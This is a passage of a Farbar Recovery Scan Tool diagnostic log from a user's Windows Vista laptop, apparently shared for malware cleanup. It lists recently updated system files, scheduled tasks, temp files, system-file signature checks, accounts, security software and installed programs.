2016-01-17 11:58 - 2015-12-05 12:02 - 00314880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00209920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00158208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00144384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax
2016-01-17 11:58 - 2015-12-05 12:02 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll
2016-01-17 11:58 - 2015-12-05 11:41 - 01886208 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01706496 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01539072 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01350656 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01127424 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01090560 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll
2016-01-17 11:58 - 2015-12-05 11:41 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 00819200 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 00732160 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 03548672 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 01571328 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00778752 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2VDEC.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00644608 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00620544 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ADEC.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00352256 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00301056 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00252416 _____ (Microsoft Corporation) C:\Windows\system32\qasf.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2016-01-17 11:58 - 2015-12-05 11:39 - 01074176 _____ (Microsoft Corporation) C:\Windows\system32\mcmde.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00471040 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL
2016-01-17 11:58 - 2015-12-05 11:39 - 00278016 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2016-01-17 11:58 - 2015-12-05 11:39 - 00187392 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL
2016-01-17 11:58 - 2015-12-05 11:39 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2016-01-17 11:58 - 2015-12-05 11:22 - 00122368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys
2016-01-17 11:57 - 2015-12-05 12:03 - 00304640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-01-17 11:57 - 2015-12-05 11:39 - 00390656 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-01-17 11:48 - 2015-12-30 11:47 - 04694464 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-01-16 08:53 - 2015-12-15 17:28 - 17892352 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-01-16 08:53 - 2015-12-15 17:25 - 02350080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-01-16 08:53 - 2015-12-15 17:21 - 10938368 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-01-16 08:53 - 2015-12-15 17:20 - 01388032 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-01-16 08:53 - 2015-12-15 17:20 - 00448512 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-01-16 08:53 - 2015-12-15 17:19 - 02158080 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-01-16 08:53 - 2015-12-15 17:19 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-01-16 08:53 - 2015-12-15 17:18 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-01-16 08:53 - 2015-12-15 17:18 - 00816128 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00579584 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00173568 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-01-16 08:53 - 2015-12-15 17:18 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2016-01-16 08:53 - 2015-12-15 17:18 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2016-01-16 08:53 - 2015-12-15 16:50 - 01814528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-01-16 08:53 - 2015-12-15 16:49 - 12388864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-01-16 08:53 - 2015-12-15 16:47 - 00367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-01-16 08:53 - 2015-12-15 16:46 - 09753088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-01-16 08:53 - 2015-12-15 16:45 - 01140224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-01-16 08:53 - 2015-12-15 16:45 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 01804800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-01-16 08:53 - 2015-12-15 16:44 - 00718848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-01-16 08:53 - 2015-12-15 16:44 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-01-16 08:53 - 2015-12-15 16:43 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2016-01-16 08:52 - 2015-12-15 16:43 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2016-01-16 08:08 - 2015-12-05 10:34 - 02799616 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapistub.dll
2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapi32.dll
2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapistub.dll
2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapi32.dll
2016-01-16 08:07 - 2015-11-13 10:27 - 00013824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
2016-01-15 14:36 - 2016-01-15 14:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2016-01-08 20:17 - 2016-01-16 07:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-26 03:04 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\inf
2016-01-26 03:04 - 2006-11-02 08:33 - 00000000 ____D C:\Windows
2016-01-26 03:04 - 2006-11-02 07:46 - 00758862 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-26 02:57 - 2014-11-19 20:20 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-26 02:57 - 2006-11-02 10:42 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-01-26 02:57 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2016-01-26 02:57 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-01-24 03:48 - 2014-11-19 20:20 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-24 03:48 - 2006-11-02 10:42 - 00032544 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-01-24 03:47 - 2015-01-19 10:44 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-01-23 18:07 - 2015-03-18 17:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverUpdate
2016-01-23 18:07 - 2014-12-15 16:45 - 00000000 ____D C:\Users\Barbara\AppData\Local\StormWatch
2016-01-23 18:07 - 2014-12-15 16:41 - 00000000 ____D C:\Users\Barbara\AppData\Local\FinanceAlert
2016-01-23 18:06 - 2014-12-15 16:39 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\ContentExplorer
2016-01-23 16:56 - 2015-03-18 17:46 - 00016152 _____ C:\Windows\system32\Drivers\SWDUMon.sys
2016-01-23 14:01 - 2015-03-17 13:00 - 00000370 _____ C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job
2016-01-21 12:18 - 2014-11-20 07:14 - 00001656 _____ C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job
2016-01-21 12:17 - 2014-11-20 07:14 - 00008002 _____ C:\Windows\System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A
2016-01-20 11:18 - 2015-01-19 10:44 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-01-20 11:18 - 2015-01-19 10:44 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-20 11:18 - 2015-01-19 10:44 - 00003682 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-01-17 12:54 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\rescache
2016-01-17 12:34 - 2014-11-22 10:31 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-01-17 12:23 - 2014-11-18 01:10 - 00000000 ____D C:\Windows\SysWOW64\RTCOM
2016-01-17 12:06 - 2014-11-18 00:49 - 00000000 ____D C:\ProgramData\Microsoft Help
2016-01-17 12:05 - 2014-11-22 10:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-01-17 11:57 - 2014-11-18 20:12 - 00000000 ____D C:\Windows\system32\MRT
2016-01-17 11:50 - 2006-11-02 07:35 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2016-01-16 08:28 - 2006-11-02 10:21 - 00332240 _____ C:\Windows\system32\FNTCACHE.DAT
2016-01-16 07:56 - 2015-05-31 10:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-01-15 14:36 - 2015-11-20 18:46 - 00000000 ____D C:\Program Files\McAfee Security Scan
2016-01-01 18:32 - 2015-01-31 14:56 - 00000000 ____D C:\Users\Barbara\Desktop\Family Tree

==================== Files in the root of some directories =======

2015-01-31 15:51 - 2015-07-22 17:07 - 0000240 _____ () C:\Users\Barbara\AppData\Roaming\wklnhst.dat
2014-11-18 18:24 - 2015-03-20 10:29 - 0000680 _____ () C:\Users\Barbara\AppData\Local\d3d9caps.dat
2014-12-15 16:46 - 2014-12-15 16:49 - 0004424 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistMSI1954.txt
2014-12-15 16:46 - 2014-12-15 16:46 - 0016288 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistUI1954.txt

Some files in TEMP:
====================
C:\Users\Barbara\AppData\Local\Temp\exec.exe
C:\Users\Barbara\AppData\Local\Temp\jre-8u31-windows-au.exe
C:\Users\Barbara\AppData\Local\Temp\NullsoftHelper.dll
C:\Users\Barbara\AppData\Local\Temp\uires.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-01-26 03:03

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:24-01-2016
Ran by Barbara (2016-01-26 03:07:15)
Running from C:\Users\Barbara\Desktop
Windows Vista Home Premium Service Pack 2 (X64) (2014-11-18 05:42:01)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3355649212-3080085010-2879840853-500 - Administrator - Disabled)
Barbara (S-1-5-21-3355649212-3080085010-2879840853-1000 - Administrator - Enabled) => C:\Users\Barbara
Guest (S-1-5-21-3355649212-3080085010-2879840853-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Out of date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AV: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {3A033352-45FD-579C-DF47-2D2DA7A56A3D}
AS: Microsoft Security Essentials (Enabled - Out of date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {8162D2B6-63C7-5812-E5F7-165FDC222080}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Reader 9.1 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Amazon Links (HKLM-x32\...\{224821ED-CADA-4A8A-AC8D-3734CC0F0931}) (Version: 1.0 - TOSHIBA Corporation)
ATI Catalyst Install Manager (HKLM\...\{190A60F1-2FEE-0A11-7D37-D8607809CC39}) (Version: 3.0.723.0 - ATI Technologies, Inc.)
Bing Bar (HKLM-x32\...\{449CE12D-E2C7-4B97-B19E-55D163EA9435}) (Version: 7.0.619.0 - Microsoft Corporation)
ccc-core-static (x32 Version: 2009.0421.2132.36832 - ATI) Hidden
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.1.6) (Version: 5.0.1.6 - Coupons.com Incorporated)
CyberLink PowerCinema for TOSHIBA (HKLM-x32\...\InstallShield_{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 6.0.2616a - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Direct DiscRecorder (x32 Version: 1.00.0000 - Corel Corporation) Hidden
Dolby Control Center (HKLM\...\{20387B45-18A4-4D48-ABD9-A23D2CBE42B3}) (Version: 2.2.1 - Dolby)
DriverUpdate (HKLM-x32\...\{B2B04F8B-6444-4364-89C8-F3088D4E8D02}) (Version: 2.2.43335 - SlimWare Utilities, Inc.)
DVD MovieFactory for TOSHIBA (HKLM-x32\...\InstallShield_{50F68032-B5B7-4513-9116-C978DBD8F27A}) (Version: 7.0.0 - Corel Corporation)
DVD MovieFactory for TOSHIBA (x32 Version: 7.0.0 - Corel Corporation) Hidden
Generations (HKLM-x32\...\{CB9EA6BB-B653-11D4-B6F6-00105A27284D}) (Version:  - )
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Intel® PROSet/Wireless WiFi Software (HKLM\...\{F22FD942-651D-4EE8-BD6F-7E0AF5E17625}) (Version: 12.04.0000 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lexmark 3400 Series (HKLM\...\Lexmark 3400 Series) (Version:  - Lexmark International, Inc.)
Lexmark Toolbar (HKLM-x32\...\{1017A80C-6F09-4548-A84D-EDD6AC9525F0}) (Version:  - )
LightScribe  1.4.124.1 (x32 Version: 1.4.124.1 - hxxp://www.lightscribe.com) Hidden
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.266.3 - McAfee, Inc.)
McAfee Security Scan Plus (HKLM-x32\...\McAfee Security Scan) (Version: 3.11.163.2 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
Mozilla Firefox 43.0.4 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 en-US)) (Version: 43.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.4.5848 - Mozilla)
MSXML 4.0 SP2 (KB941833) (HKLM-x32\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 and SOAP Toolkit 3.0 (x32 Version: 1.0.0.0 - Webroot Software, Inc.) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
PlayReady PC runtime (HKLM\...\{704ABF63-B0B1-446B-9D92-C5D06AFCE7B6}) (Version: 1 - Microsoft Corporation)
QuickBooks Financial Center (HKLM-x32\...\{890EF3F8-742F-46BD-9E8E-084B3A1F4364}) (Version: 1.10.0000 - Intuit Inc.)
Realtek 8136 8168 8169 Ethernet Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0004 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5809 - Realtek Semiconductor Corp.)
RICOH R5U230 Media Driver ver.2.02.02.01 (HKLM-x32\...\{022CBB38-CEF0-42BA-906A-A49BEFAE0BEE}) (Version: 2.02.02.01 - RICOH)
Segoe UI (x32 Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Skins (x32 Version: 2009.0421.2132.36832 - ATI) Hidden
Skype Launcher (HKLM-x32\...\{BF5A20B4-55F7-49B8-9302-FAC7C459AF3D}) (Version: 1.0 - TOSHIBA Corporation)
Spy Sweeper Core (x32 Version: 4.4.0.85 - Webroot Software) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 12.2.10.0 - Synaptics Incorporated)
TOSHIBA Agreement Notification Utility (HKLM-x32\...\InstallShield_{83892653-9EB8-4192-803E-D987A85CDD23}) (Version: 1.0.11.0 - TOSHIBA Corporation)
Toshiba Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.0.4 - Toshiba)
TOSHIBA Assist (HKLM-x32\...\{1B87C40B-A60B-4EF3-9A68-706CF4B69978}) (Version: 3.00.08 - TOSHIBA)
TOSHIBA ConfigFree (HKLM-x32\...\{F0A386D2-6E15-4A8F-A04E-87CE9BED0D48}) (Version: 7.4.8 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.0.1.3 for x64 - TOSHIBA Corporation)
TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.00.1.04-A - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM-x32\...\InstallShield_{B3FF1CD9-B2F0-4D71-BB55-5F580401C48E}) (Version: 1.0.2.64 - TOSHIBA Corporation)
TOSHIBA Extended Tiles for Windows Mobility Center (HKLM-x32\...\InstallShield_{617C36FD-0CBE-4600-84B2-441CEB12FADF}) (Version:  - )
